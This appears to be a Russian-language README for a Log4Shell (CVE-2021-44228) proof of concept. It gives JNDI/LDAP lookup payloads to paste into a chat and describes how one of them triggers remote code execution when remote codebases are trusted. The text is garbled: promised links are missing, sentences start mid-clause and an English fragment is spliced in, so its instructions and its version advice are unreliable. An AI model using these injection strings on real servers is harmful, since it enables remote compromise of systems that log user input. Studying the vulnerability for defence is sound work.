
Log4j-RCE (CVE-2021-44228) Proof of Concept с дополнительной информацией
Это proof of concept эксплуатации уязвимости log4j rce.
Вот несколько ссылок по CVE-2021-44228:
Эта ошибка затрагивает почти все версии log4j2 и, возможно, log4j1. Рекомендуемая версия для использования — 2.15.0, которая устраняет эксплуатацию.
${jndi:ldap://127.0.0.1/e} в чат. Если на порту 389 есть открытый сокет, log4j пытается подключиться и блокирует дальнейшее общение до наступления таймаута.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!, что представляет собой сериализованный строковый объект от ldap-сервера.
${jndi:ldap://127.0.0.1/exe} в чат. Если -Dcom.sun.jndi.ldap.object.trustURLCodebase=true установлен в true, произойдёт удалённое выполнение кода.
Этот проект предназначен только для образовательных целей.